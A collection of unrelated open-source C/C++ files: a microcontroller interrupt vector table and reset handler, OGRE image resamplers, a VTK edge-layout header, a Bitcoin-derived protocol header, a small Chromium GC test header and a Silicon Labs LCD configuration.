    /* External Interrupts */
    (uint32_t) BOD_IRQHandler,          // 0: Brown Out detection
    (uint32_t) IRC_IRQHandler,          // 1: Internal RC
    (uint32_t) PWRWU_IRQHandler,        // 2: Power down wake up
    (uint32_t) RAMPE_IRQHandler,        // 3: RAM parity error
    (uint32_t) CLKFAIL_IRQHandler,      // 4: Clock detection fail
    (uint32_t) Default_Handler,         // 5: Reserved
    (uint32_t) RTC_IRQHandler,          // 6: Real Time Clock
    (uint32_t) TAMPER_IRQHandler,       // 7: Tamper detection
    (uint32_t) WDT_IRQHandler,          // 8: Watchdog timer
    (uint32_t) WWDT_IRQHandler,         // 9: Window watchdog timer
    (uint32_t) EINT0_IRQHandler,        // 10: External Input 0
    (uint32_t) EINT1_IRQHandler,        // 11: External Input 1
    (uint32_t) EINT2_IRQHandler,        // 12: External Input 2
    (uint32_t) EINT3_IRQHandler,        // 13: External Input 3
    (uint32_t) EINT4_IRQHandler,        // 14: External Input 4
    (uint32_t) EINT5_IRQHandler,        // 15: External Input 5
    (uint32_t) GPA_IRQHandler,          // 16: GPIO Port A
    (uint32_t) GPB_IRQHandler,          // 17: GPIO Port B
    (uint32_t) GPC_IRQHandler,          // 18: GPIO Port C
    (uint32_t) GPD_IRQHandler,          // 19: GPIO Port D
    (uint32_t) GPE_IRQHandler,          // 20: GPIO Port E
    (uint32_t) GPF_IRQHandler,          // 21: GPIO Port F
    (uint32_t) SPI0_IRQHandler,         // 22: SPI0
    (uint32_t) SPI1_IRQHandler,         // 23: SPI1
    (uint32_t) BRAKE0_IRQHandler,       // 24:
    (uint32_t) PWM0P0_IRQHandler,       // 25:
    (uint32_t) PWM0P1_IRQHandler,       // 26:
    (uint32_t) PWM0P2_IRQHandler,       // 27:
    (uint32_t) BRAKE1_IRQHandler,       // 28:
    (uint32_t) PWM1P0_IRQHandler,       // 29:
    (uint32_t) PWM1P1_IRQHandler,       // 30:
    (uint32_t) PWM1P2_IRQHandler,       // 31:
    (uint32_t) TMR0_IRQHandler,         // 32: Timer 0
    (uint32_t) TMR1_IRQHandler,         // 33: Timer 1
    (uint32_t) TMR2_IRQHandler,         // 34: Timer 2
    (uint32_t) TMR3_IRQHandler,         // 35: Timer 3
    (uint32_t) UART0_IRQHandler,        // 36: UART0
    (uint32_t) UART1_IRQHandler,        // 37: UART1
    (uint32_t) I2C0_IRQHandler,         // 38: I2C0
    (uint32_t) I2C1_IRQHandler,         // 39: I2C1
    (uint32_t) PDMA_IRQHandler,         // 40: Peripheral DMA
    (uint32_t) DAC_IRQHandler,          // 41: DAC
    (uint32_t) ADC00_IRQHandler,        // 42: ADC0 interrupt source 0
    (uint32_t) ADC01_IRQHandler,        // 43: ADC0 interrupt source 1
    (uint32_t) ACMP01_IRQHandler,       // 44: ACMP0 and ACMP1
    (uint32_t) Default_Handler,         // 45: Reserved
    (uint32_t) ADC02_IRQHandler,        // 46: ADC0 interrupt source 2
    (uint32_t) ADC03_IRQHandler,        // 47: ADC0 interrupt source 3
    (uint32_t) UART2_IRQHandler,        // 48: UART2
    (uint32_t) UART3_IRQHandler,        // 49: UART3
    (uint32_t) Default_Handler,         // 50: Reserved
    (uint32_t) SPI2_IRQHandler,         // 51: SPI2
    (uint32_t) Default_Handler,         // 52: Reserved
    (uint32_t) USBD_IRQHandler,         // 53: USB device
    (uint32_t) USBH_IRQHandler,         // 54: USB host
    (uint32_t) USBOTG_IRQHandler,       // 55: USB OTG
    (uint32_t) CAN0_IRQHandler,         // 56: CAN0
    (uint32_t) Default_Handler,         // 57: Reserved
    (uint32_t) SC0_IRQHandler,          // 58:
    (uint32_t) Default_Handler,         // 59: Reserved.
    (uint32_t) Default_Handler,         // 60:
    (uint32_t) Default_Handler,         // 61:
    (uint32_t) Default_Handler,         // 62:
    (uint32_t) TK_IRQHandler,           // 63:
};

/**
 * \brief This is the code that gets called on processor reset.
 *
 * Sequence: unlock protected registers, disable POR, select HXT crystal
 * type, relock, run SystemInit() (must be first — it also sets up EBI
 * external SRAM), then hand off to the toolchain's C runtime startup.
 */
void Reset_Handler(void)
{
    /* Disable register write-protection function */
    SYS_UnlockReg();

    /* Disable Power-on Reset function */
    SYS_DISABLE_POR();

    /* HXT Crystal Type Select: INV */
    CLK->PWRCTL &= ~CLK_PWRCTL_HXTSELTYP_Msk;

    /* Enable register write-protection function */
    SYS_LockReg();

    /**
     * Because EBI (external SRAM) init is done in SystemInit(), SystemInit()
     * must be called at the very start.
     */
    SystemInit();

#if defined(__CC_ARM)
    __main();

#elif defined(__ICCARM__)
    __iar_program_start();

#elif defined(__GNUC__)
    /* Scatter-load by hand: copy .data from flash, zero .bss. */
    uint32_t *src_ind = (uint32_t *) &__etext;
    uint32_t *dst_ind = (uint32_t *) &__data_start__;
    uint32_t *dst_end = (uint32_t *) &__data_end__;

    /* Move .data section from ROM to RAM */
    if (src_ind != dst_ind) {
        for (; dst_ind < dst_end;) {
            *dst_ind ++ = *src_ind ++;
        }
    }

    /* Initialize .bss section to zero */
    dst_ind = (uint32_t *) &__bss_start__;
    dst_end = (uint32_t *) &__bss_end__;
    if (dst_ind != dst_end) {
        for (; dst_ind < dst_end;) {
            *dst_ind ++ = 0;
        }
    }

    //uvisor_init();

    /* software_init_hook is weak: non-NULL address means an RTOS provided it. */
    if (software_init_hook) {
        /**
         * Give control to the RTOS via software_init_hook() which will also call __libc_init_array().
         * Assume software_init_hook() is defined in libraries/rtos/rtx/TARGET_CORTEX_M/RTX_CM_lib.h.
         */
        software_init_hook();
    }
    else {
        /* Run C++ static constructors, then enter the application. */
        __libc_init_array();
        main();
    }
#endif

    /* Infinite loop */
    while (1);
}

/**
 * \brief Default interrupt handler for unused IRQs.
 */
void Default_Handler(void)
{
    while (1);
}
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef REF_PTR_TO_GC_MANAGED_CLASS_H_ #define REF_PTR_TO_GC_MANAGED_CLASS_H_ #include "heap/stubs.h" namespace WebCore { class HeapObject; class PartObject { DISALLOW_ALLOCATION(); private: RefPtr<HeapObject> m_obj; }; class HeapObject : public GarbageCollected<HeapObject> { public: void trace(Visitor*); private: PartObject m_part; Vector<RefPtr<HeapObject> > m_objs; }; } #endif
/* ----------------------------------------------------------------------------- This source file is part of OGRE (Object-oriented Graphics Rendering Engine) For the latest info, see http://www.ogre3d.org/ Copyright (c) 2000-2014 Torus Knot Software Ltd Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ----------------------------------------------------------------------------- */ #ifndef OGREIMAGERESAMPLER_H #define OGREIMAGERESAMPLER_H #include <algorithm> // this file is inlined into OgreImage.cpp! // do not include anywhere else. namespace Ogre { /** \addtogroup Core * @{ */ /** \addtogroup Image * @{ */ // variable name hints: // sx_48 = 16/48-bit fixed-point x-position in source // stepx = difference between adjacent sx_48 values // sx1 = lower-bound integer x-position in source // sx2 = upper-bound integer x-position in source // sxf = fractional weight between sx1 and sx2 // x,y,z = location of output pixel in destination // nearest-neighbor resampler, does not convert formats. 
// templated on bytes-per-pixel to allow compiler optimizations, such
// as simplifying memcpy() and replacing multiplies with bitshifts
template<unsigned int elemsize> struct NearestResampler {
	// Scale src into dst by picking, for each destination pixel, the single
	// nearest source pixel. No format conversion: both boxes must share the
	// same format (elemsize bytes per pixel).
	static void scale(const PixelBox& src, const PixelBox& dst) {
		// assert(src.format == dst.format);

		// srcdata stays at beginning, pdst is a moving pointer
		uchar* srcdata = (uchar*)src.getTopLeftFrontPixelPtr();
		uchar* pdst = (uchar*)dst.getTopLeftFrontPixelPtr();

		// sx_48,sy_48,sz_48 represent current position in source
		// using 16/48-bit fixed precision, incremented by steps
		uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth();
		uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight();
		uint64 stepz = ((uint64)src.getDepth() << 48) / dst.getDepth();

		// note: ((stepz>>1) - 1) is an extra half-step increment to adjust
		// for the center of the destination pixel, not the top-left corner
		uint64 sz_48 = (stepz >> 1) - 1;
		for (size_t z = dst.front; z < dst.back; z++, sz_48 += stepz) {
			size_t srczoff = (size_t)(sz_48 >> 48) * src.slicePitch;

			uint64 sy_48 = (stepy >> 1) - 1;
			for (size_t y = dst.top; y < dst.bottom; y++, sy_48 += stepy) {
				size_t srcyoff = (size_t)(sy_48 >> 48) * src.rowPitch;

				uint64 sx_48 = (stepx >> 1) - 1;
				for (size_t x = dst.left; x < dst.right; x++, sx_48 += stepx) {
					// integer part of the fixed-point coordinate selects
					// the nearest source pixel
					uchar* psrc = srcdata +
						elemsize*((size_t)(sx_48 >> 48) + srcyoff + srczoff);
					memcpy(pdst, psrc, elemsize);
					pdst += elemsize;
				}
				pdst += elemsize*dst.getRowSkip();
			}
			pdst += elemsize*dst.getSliceSkip();
		}
	}
};


// default floating-point linear resampler, does format conversion
struct LinearResampler {
	// Trilinear resample of src into dst via ColourValue unpack/pack, so
	// arbitrary (unpackable) pixel formats can be mixed between src and dst.
	static void scale(const PixelBox& src, const PixelBox& dst) {
		size_t srcelemsize = PixelUtil::getNumElemBytes(src.format);
		size_t dstelemsize = PixelUtil::getNumElemBytes(dst.format);

		// srcdata stays at beginning, pdst is a moving pointer
		uchar* srcdata = (uchar*)src.getTopLeftFrontPixelPtr();
		uchar* pdst = (uchar*)dst.getTopLeftFrontPixelPtr();

		// sx_48,sy_48,sz_48 represent current position in source
		// using 16/48-bit fixed precision, incremented by steps
		uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth();
		uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight();
		uint64 stepz = ((uint64)src.getDepth() << 48) / dst.getDepth();

		// note: ((stepz>>1) - 1) is an extra half-step increment to adjust
		// for the center of the destination pixel, not the top-left corner
		uint64 sz_48 = (stepz >> 1) - 1;
		for (size_t z = dst.front; z < dst.back; z++, sz_48+=stepz) {
			// temp is 16/16 bit fixed precision, used to adjust a source
			// coordinate (x, y, or z) backwards by half a pixel so that the
			// integer bits represent the first sample (eg, sx1) and the
			// fractional bits are the blend weight of the second sample
			unsigned int temp = static_cast<unsigned int>(sz_48 >> 32);
			temp = (temp > 0x8000)? temp - 0x8000 : 0;
			uint32 sz1 = temp >> 16;                 // src z, sample #1
			uint32 sz2 = std::min(sz1+1,src.getDepth()-1);// src z, sample #2
			float szf = (temp & 0xFFFF) / 65536.f; // weight of sample #2

			uint64 sy_48 = (stepy >> 1) - 1;
			for (size_t y = dst.top; y < dst.bottom; y++, sy_48+=stepy) {
				temp = static_cast<unsigned int>(sy_48 >> 32);
				temp = (temp > 0x8000)? temp - 0x8000 : 0;
				uint32 sy1 = temp >> 16;                 // src y #1
				uint32 sy2 = std::min(sy1+1,src.getHeight()-1);// src y #2
				float syf = (temp & 0xFFFF) / 65536.f; // weight of #2

				uint64 sx_48 = (stepx >> 1) - 1;
				for (size_t x = dst.left; x < dst.right; x++, sx_48+=stepx) {
					temp = static_cast<unsigned int>(sx_48 >> 32);
					temp = (temp > 0x8000)? temp - 0x8000 : 0;
					uint32 sx1 = temp >> 16;                 // src x #1
					uint32 sx2 = std::min(sx1+1,src.getWidth()-1);// src x #2
					float sxf = (temp & 0xFFFF) / 65536.f; // weight of #2

					// unpack the 8 corner texels surrounding the sample point
					ColourValue x1y1z1, x2y1z1, x1y2z1, x2y2z1;
					ColourValue x1y1z2, x2y1z2, x1y2z2, x2y2z2;

#define UNPACK(dst,x,y,z) PixelUtil::unpackColour(&dst, src.format, \
	srcdata + srcelemsize*((x)+(y)*src.rowPitch+(z)*src.slicePitch))

					UNPACK(x1y1z1,sx1,sy1,sz1); UNPACK(x2y1z1,sx2,sy1,sz1);
					UNPACK(x1y2z1,sx1,sy2,sz1); UNPACK(x2y2z1,sx2,sy2,sz1);
					UNPACK(x1y1z2,sx1,sy1,sz2); UNPACK(x2y1z2,sx2,sy1,sz2);
					UNPACK(x1y2z2,sx1,sy2,sz2); UNPACK(x2y2z2,sx2,sy2,sz2);
#undef UNPACK

					// standard trilinear weighting of the 8 corners
					ColourValue accum =
						x1y1z1 * ((1.0f - sxf)*(1.0f - syf)*(1.0f - szf)) +
						x2y1z1 * (        sxf *(1.0f - syf)*(1.0f - szf)) +
						x1y2z1 * ((1.0f - sxf)*        syf *(1.0f - szf)) +
						x2y2z1 * (        sxf *        syf *(1.0f - szf)) +
						x1y1z2 * ((1.0f - sxf)*(1.0f - syf)*        szf ) +
						x2y1z2 * (        sxf *(1.0f - syf)*        szf ) +
						x1y2z2 * ((1.0f - sxf)*        syf *        szf ) +
						x2y2z2 * (        sxf *        syf *        szf );

					PixelUtil::packColour(accum, dst.format, pdst);

					pdst += dstelemsize;
				}
				pdst += dstelemsize*dst.getRowSkip();
			}
			pdst += dstelemsize*dst.getSliceSkip();
		}
	}
};


// float32 linear resampler, converts FLOAT32_RGB/FLOAT32_RGBA only.
// avoids overhead of pixel unpack/repack function calls
struct LinearResampler_Float32 {
	// Trilinear resample specialized for float RGB/RGBA: reads the source
	// channels directly instead of going through unpackColour/packColour.
	static void scale(const PixelBox& src, const PixelBox& dst) {
		size_t srcchannels = PixelUtil::getNumElemBytes(src.format) / sizeof(float);
		size_t dstchannels = PixelUtil::getNumElemBytes(dst.format) / sizeof(float);
		// assert(srcchannels == 3 || srcchannels == 4);
		// assert(dstchannels == 3 || dstchannels == 4);

		// srcdata stays at beginning, pdst is a moving pointer
		float* srcdata = (float*)src.getTopLeftFrontPixelPtr();
		float* pdst = (float*)dst.getTopLeftFrontPixelPtr();

		// sx_48,sy_48,sz_48 represent current position in source
		// using 16/48-bit fixed precision, incremented by steps
		uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth();
		uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight();
		uint64 stepz = ((uint64)src.getDepth() << 48) / dst.getDepth();

		// note: ((stepz>>1) - 1) is an extra half-step increment to adjust
		// for the center of the destination pixel, not the top-left corner
		uint64 sz_48 = (stepz >> 1) - 1;
		for (size_t z = dst.front; z < dst.back; z++, sz_48+=stepz) {
			// temp is 16/16 bit fixed precision, used to adjust a source
			// coordinate (x, y, or z) backwards by half a pixel so that the
			// integer bits represent the first sample (eg, sx1) and the
			// fractional bits are the blend weight of the second sample
			unsigned int temp = static_cast<unsigned int>(sz_48 >> 32);
			temp = (temp > 0x8000)? temp - 0x8000 : 0;
			uint32 sz1 = temp >> 16;                 // src z, sample #1
			uint32 sz2 = std::min(sz1+1,src.getDepth()-1);// src z, sample #2
			float szf = (temp & 0xFFFF) / 65536.f; // weight of sample #2

			uint64 sy_48 = (stepy >> 1) - 1;
			for (size_t y = dst.top; y < dst.bottom; y++, sy_48+=stepy) {
				temp = static_cast<unsigned int>(sy_48 >> 32);
				temp = (temp > 0x8000)? temp - 0x8000 : 0;
				uint32 sy1 = temp >> 16;                 // src y #1
				uint32 sy2 = std::min(sy1+1,src.getHeight()-1);// src y #2
				float syf = (temp & 0xFFFF) / 65536.f; // weight of #2

				uint64 sx_48 = (stepx >> 1) - 1;
				for (size_t x = dst.left; x < dst.right; x++, sx_48+=stepx) {
					temp = static_cast<unsigned int>(sx_48 >> 32);
					temp = (temp > 0x8000)? temp - 0x8000 : 0;
					uint32 sx1 = temp >> 16;                 // src x #1
					uint32 sx2 = std::min(sx1+1,src.getWidth()-1);// src x #2
					float sxf = (temp & 0xFFFF) / 65536.f; // weight of #2

					// process R,G,B,A simultaneously for cache coherence?
					float accum[4] = { 0.0f, 0.0f, 0.0f, 0.0f };

// accumulate one weighted corner texel (3- and 4-channel variants)
#define ACCUM3(x,y,z,factor) \
	{ float f = factor; \
	size_t off = (x+y*src.rowPitch+z*src.slicePitch)*srcchannels; \
	accum[0]+=srcdata[off+0]*f; accum[1]+=srcdata[off+1]*f; \
	accum[2]+=srcdata[off+2]*f; }

#define ACCUM4(x,y,z,factor) \
	{ float f = factor; \
	size_t off = (x+y*src.rowPitch+z*src.slicePitch)*srcchannels; \
	accum[0]+=srcdata[off+0]*f; accum[1]+=srcdata[off+1]*f; \
	accum[2]+=srcdata[off+2]*f; accum[3]+=srcdata[off+3]*f; }

					if (srcchannels == 3 || dstchannels == 3) {
						// RGB, no alpha
						ACCUM3(sx1,sy1,sz1,(1.0f-sxf)*(1.0f-syf)*(1.0f-szf));
						ACCUM3(sx2,sy1,sz1,      sxf *(1.0f-syf)*(1.0f-szf));
						ACCUM3(sx1,sy2,sz1,(1.0f-sxf)*      syf *(1.0f-szf));
						ACCUM3(sx2,sy2,sz1,      sxf *      syf *(1.0f-szf));
						ACCUM3(sx1,sy1,sz2,(1.0f-sxf)*(1.0f-syf)*      szf );
						ACCUM3(sx2,sy1,sz2,      sxf *(1.0f-syf)*      szf );
						ACCUM3(sx1,sy2,sz2,(1.0f-sxf)*      syf *      szf );
						ACCUM3(sx2,sy2,sz2,      sxf *      syf *      szf );
						accum[3] = 1.0f;
					} else {
						// RGBA
						ACCUM4(sx1,sy1,sz1,(1.0f-sxf)*(1.0f-syf)*(1.0f-szf));
						ACCUM4(sx2,sy1,sz1,      sxf *(1.0f-syf)*(1.0f-szf));
						ACCUM4(sx1,sy2,sz1,(1.0f-sxf)*      syf *(1.0f-szf));
						ACCUM4(sx2,sy2,sz1,      sxf *      syf *(1.0f-szf));
						ACCUM4(sx1,sy1,sz2,(1.0f-sxf)*(1.0f-syf)*      szf );
						ACCUM4(sx2,sy1,sz2,      sxf *(1.0f-syf)*      szf );
						ACCUM4(sx1,sy2,sz2,(1.0f-sxf)*      syf *      szf );
						ACCUM4(sx2,sy2,sz2,      sxf *      syf *      szf );
					}

					memcpy(pdst, accum, sizeof(float)*dstchannels);

#undef ACCUM3
#undef ACCUM4

					pdst += dstchannels;
				}
				pdst += dstchannels*dst.getRowSkip();
			}
			pdst += dstchannels*dst.getSliceSkip();
		}
	}
};


// byte linear resampler, does not do any format conversions.
// only handles pixel formats that use 1 byte per color channel.
// 2D only; punts 3D pixelboxes to default LinearResampler (slow).
// templated on bytes-per-pixel to allow compiler optimizations, such
// as unrolling loops and replacing multiplies with bitshifts
template<unsigned int channels> struct LinearResampler_Byte {
	// Bilinear resample in pure integer math (8/24-bit fixed point).
	static void scale(const PixelBox& src, const PixelBox& dst) {
		// assert(src.format == dst.format);

		// only optimized for 2D
		if (src.getDepth() > 1 || dst.getDepth() > 1) {
			LinearResampler::scale(src, dst);
			return;
		}

		// srcdata stays at beginning of slice, pdst is a moving pointer
		uchar* srcdata = (uchar*)src.getTopLeftFrontPixelPtr();
		uchar* pdst = (uchar*)dst.getTopLeftFrontPixelPtr();

		// sx_48,sy_48 represent current position in source
		// using 16/48-bit fixed precision, incremented by steps
		uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth();
		uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight();

		uint64 sy_48 = (stepy >> 1) - 1;
		for (size_t y = dst.top; y < dst.bottom; y++, sy_48+=stepy) {
			// bottom 28 bits of temp are 16/12 bit fixed precision, used to
			// adjust a source coordinate backwards by half a pixel so that the
			// integer bits represent the first sample (eg, sx1) and the
			// fractional bits are the blend weight of the second sample
			unsigned int temp = static_cast<unsigned int>(sy_48 >> 36);
			temp = (temp > 0x800)? temp - 0x800: 0;
			unsigned int syf = temp & 0xFFF;
			uint32 sy1 = temp >> 12;
			uint32 sy2 = std::min(sy1+1, src.bottom-src.top-1);
			size_t syoff1 = sy1 * src.rowPitch;
			size_t syoff2 = sy2 * src.rowPitch;

			uint64 sx_48 = (stepx >> 1) - 1;
			for (size_t x = dst.left; x < dst.right; x++, sx_48+=stepx) {
				temp = static_cast<unsigned int>(sx_48 >> 36);
				temp = (temp > 0x800)? temp - 0x800 : 0;
				unsigned int sxf = temp & 0xFFF;
				uint32 sx1 = temp >> 12;
				uint32 sx2 = std::min(sx1+1, src.right-src.left-1);

				unsigned int sxfsyf = sxf*syf;
				for (unsigned int k = 0; k < channels; k++) {
					// weights of the four corners expressed so their sum is
					// exactly 0x1000000 (1.0 in 8/24 fixed point)
					unsigned int accum =
						srcdata[(sx1 + syoff1)*channels+k]*(0x1000000-(sxf<<12)-(syf<<12)+sxfsyf) +
						srcdata[(sx2 + syoff1)*channels+k]*((sxf<<12)-sxfsyf) +
						srcdata[(sx1 + syoff2)*channels+k]*((syf<<12)-sxfsyf) +
						srcdata[(sx2 + syoff2)*channels+k]*sxfsyf;
					// accum is computed using 8/24-bit fixed-point math
					// (maximum is 0xFF000000; rounding will not cause overflow)
					*pdst++ = static_cast<uchar>((accum + 0x800000) >> 24);
				}
			}
			pdst += channels*dst.getRowSkip();
		}
	}
};
/** @} */
/** @} */

}

#endif
/*=========================================================================

  Program:   Visualization Toolkit
  Module:    vtkEdgeLayoutStrategy.h

  Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
  All rights reserved.
  See Copyright.txt or http://www.kitware.com/Copyright.htm for details.

     This software is distributed WITHOUT ANY WARRANTY; without even
     the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
     PURPOSE.  See the above copyright notice for more information.

=========================================================================*/
/*----------------------------------------------------------------------------
 Copyright (c) Sandia Corporation
 See Copyright.txt or http://www.paraview.org/HTML/Copyright.html for details.
----------------------------------------------------------------------------*/
/**
 * @class   vtkEdgeLayoutStrategy
 * @brief   abstract superclass for all edge layout strategies
 *
 *
 * All edge layouts should subclass from this class.  vtkEdgeLayoutStrategy
 * works as a plug-in to the vtkEdgeLayout algorithm.
 */

#ifndef vtkEdgeLayoutStrategy_h
#define vtkEdgeLayoutStrategy_h

#include "vtkInfovisLayoutModule.h" // For export macro
#include "vtkObject.h"

class vtkGraph;

class VTKINFOVISLAYOUT_EXPORT vtkEdgeLayoutStrategy : public vtkObject
{
public:
  vtkTypeMacro(vtkEdgeLayoutStrategy,vtkObject);
  void PrintSelf(ostream& os, vtkIndent indent) override;

  /**
   * Setting the graph for the layout strategy
   */
  virtual void SetGraph(vtkGraph *graph);

  /**
   * This method allows the layout strategy to
   * do initialization of data structures
   * or whatever else it might want to do.
   */
  virtual void Initialize() {}

  /**
   * This is the layout method where the graph that was
   * set in SetGraph() is laid out.
   */
  virtual void Layout()=0;

  //@{
  /**
   * Set/Get the field to use for the edge weights.
   */
  vtkSetStringMacro(EdgeWeightArrayName);
  vtkGetStringMacro(EdgeWeightArrayName);
  //@}

protected:
  vtkEdgeLayoutStrategy();
  ~vtkEdgeLayoutStrategy() override;

  // Graph being laid out; set via SetGraph() (not owned exclusively —
  // managed per VTK reference-counting conventions).
  vtkGraph *Graph;
  // Name of the edge-weight array; string storage managed by the
  // vtkSet/GetStringMacro pair above.
  char *EdgeWeightArrayName;

private:
  vtkEdgeLayoutStrategy(const vtkEdgeLayoutStrategy&) = delete;
  void operator=(const vtkEdgeLayoutStrategy&) = delete;
};

#endif
// Copyright (c) 2009-2010 Satoshi Nakamoto
// Copyright (c) 2009-2012 The Bitcoin developers
// Distributed under the MIT/X11 software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.

#ifndef __cplusplus
# error This header can only be compiled as C++.
#endif

#ifndef __INCLUDED_PROTOCOL_H__
#define __INCLUDED_PROTOCOL_H__

#include "serialize.h"
#include "netbase.h"
#include <string>
#include "uint256.h"

extern bool fTestNet;

// Default P2P listen port; defaults to the network selected by the
// global fTestNet flag unless explicitly overridden by the caller.
static inline unsigned short GetDefaultPort(const bool testnet = fTestNet)
{
    return testnet ? 17893 : 7893;
}

// Magic bytes identifying the network; every message on the wire
// begins with these four bytes.
extern unsigned char pchMessageStart[4];

/** Message header.
 * (4) message start.
 * (12) command.
 * (4) size.
 * (4) checksum.
 */
class CMessageHeader
{
    public:
        CMessageHeader();
        CMessageHeader(const char* pszCommand, unsigned int nMessageSizeIn);

        // Returns the command name with trailing NUL padding stripped.
        std::string GetCommand() const;
        // Sanity-checks magic bytes, command characters and message size.
        bool IsValid() const;

        IMPLEMENT_SERIALIZE
            (
             READWRITE(FLATDATA(pchMessageStart));
             READWRITE(FLATDATA(pchCommand));
             READWRITE(nMessageSize);
             READWRITE(nChecksum);
            )

    // TODO: make private (improves encapsulation)
    public:
        // Byte offsets/sizes of the fixed wire layout described above.
        enum
        {
            MESSAGE_START_SIZE=sizeof(::pchMessageStart),
            COMMAND_SIZE=12,
            MESSAGE_SIZE_SIZE=sizeof(int),
            CHECKSUM_SIZE=sizeof(int),

            MESSAGE_SIZE_OFFSET=MESSAGE_START_SIZE+COMMAND_SIZE,
            CHECKSUM_OFFSET=MESSAGE_SIZE_OFFSET+MESSAGE_SIZE_SIZE,
            HEADER_SIZE=MESSAGE_START_SIZE+COMMAND_SIZE+MESSAGE_SIZE_SIZE+CHECKSUM_SIZE
        };
        char pchMessageStart[MESSAGE_START_SIZE];
        char pchCommand[COMMAND_SIZE];
        unsigned int nMessageSize;
        unsigned int nChecksum;
};

/** nServices flags */
enum
{
    NODE_NETWORK = (1 << 0),
    NODE_BLOOM = (1 << 1),
};

/** A CService with information about it as peer */
class CAddress : public CService
{
    public:
        CAddress();
        explicit CAddress(CService ipIn, uint64 nServicesIn=NODE_NETWORK);

        void Init();

        // Serialization is version/flag dependent: nVersion is only stored
        // on disk, and nTime is skipped for old peers and for GETHASH.
        IMPLEMENT_SERIALIZE
            (
             CAddress* pthis = const_cast<CAddress*>(this);
             CService* pip = (CService*)pthis;
             if (fRead)
                 pthis->Init();
             if (nType & SER_DISK)
                 READWRITE(nVersion);
             if ((nType & SER_DISK) ||
                 (nVersion >= CADDR_TIME_VERSION && !(nType & SER_GETHASH)))
                 READWRITE(nTime);
             READWRITE(nServices);
             READWRITE(*pip);
            )

        void print() const;

    // TODO: make private (improves encapsulation)
    public:
        uint64 nServices;

        // disk and network only
        unsigned int nTime;

        // memory only
        int64 nLastTry;
};

/** inv message data */
class CInv
{
    public:
        CInv();
        CInv(int typeIn, const uint256& hashIn);
        CInv(const std::string& strType, const uint256& hashIn);

        IMPLEMENT_SERIALIZE
        (
            READWRITE(type);
            READWRITE(hash);
        )

        friend bool operator<(const CInv& a, const CInv& b);

        bool IsKnownType() const;
        const char* GetCommand() const;
        std::string ToString() const;
        void print() const;

    // TODO: make private (improves encapsulation)
    public:
        // One of the MSG_* values below.
        int type;
        uint256 hash;
};

// Inventory item types used by CInv::type.
enum
{
    MSG_TX = 1,
    MSG_BLOCK,
    // Nodes may always request a MSG_FILTERED_BLOCK in a getdata, however,
    // MSG_FILTERED_BLOCK should not appear in any invs except as a part of getdata.
    MSG_FILTERED_BLOCK,
};

#endif // __INCLUDED_PROTOCOL_H__
/***************************************************************************//**
 * @file displayls013b7dh03config.h
 * @brief BRD4104A specific configuration for the display driver for
 *        the Sharp Memory LCD model LS013B7DH03.
 * @version 5.6.0
 *******************************************************************************
 * # License
 * <b>Copyright 2017 Silicon Labs, Inc. http://www.silabs.com</b>
 *******************************************************************************
 *
 * This file is licensed under the Silabs License Agreement. See the file
 * "Silabs_License_Agreement.txt" for details. Before using this software for
 * any purpose, you must agree to the terms of that agreement.
 *
 ******************************************************************************/

#ifndef DISPLAYLS013B7DH03CONFIG_H
#define DISPLAYLS013B7DH03CONFIG_H

#include "displayconfigapp.h"

/* Display device name. */
#define SHARP_MEMLCD_DEVICE_NAME "Sharp LS013B7DH03 #1"

/* LCD and SPI GPIO pin connections on the kit. */
#define LCD_PORT_SCLK       (gpioPortC) /* EFM_DISP_SCLK on PC8 */
#define LCD_PIN_SCLK        (8)
#define LCD_PORT_SI         (gpioPortC) /* EFM_DISP_MOSI on PC6 */
#define LCD_PIN_SI          (6)
#define LCD_PORT_SCS        (gpioPortD) /* EFM_DISP_CS on PD14 */
#define LCD_PIN_SCS         (14)
#define LCD_PORT_EXTCOMIN   (gpioPortD) /* EFM_DISP_COM on PD13 */
#define LCD_PIN_EXTCOMIN    (13)
#define LCD_PORT_DISP_SEL   (gpioPortD) /* EFM_DISP_ENABLE on PD15 */
#define LCD_PIN_DISP_SEL    (15)

/* PRS settings for polarity inversion extcomin auto toggle. */
#define LCD_AUTO_TOGGLE_PRS_CH (4) /* PRS channel 4. */
#define LCD_AUTO_TOGGLE_PRS_ROUTELOC() PRS->ROUTELOC1 = \
  ((PRS->ROUTELOC1 & ~_PRS_ROUTELOC1_CH4LOC_MASK) | PRS_ROUTELOC1_CH4LOC_LOC4)
#define LCD_AUTO_TOGGLE_PRS_ROUTEPEN PRS_ROUTEPEN_CH4PEN

/*
 * Select how LCD polarity inversion should be handled:
 *
 * If POLARITY_INVERSION_EXTCOMIN is defined, the polarity inversion is armed
 * for every rising edge of the EXTCOMIN pin. The actual polarity inversion is
 * triggered at the next transition of SCS. This mode is recommended because
 * it causes less CPU and SPI load than the alternative mode, see below.
 * If POLARITY_INVERSION_EXTCOMIN is undefined, the polarity inversion is
 * toggled by sending an SPI command. This mode causes more CPU and SPI load
 * than using the EXTCOMIN pin mode.
 */
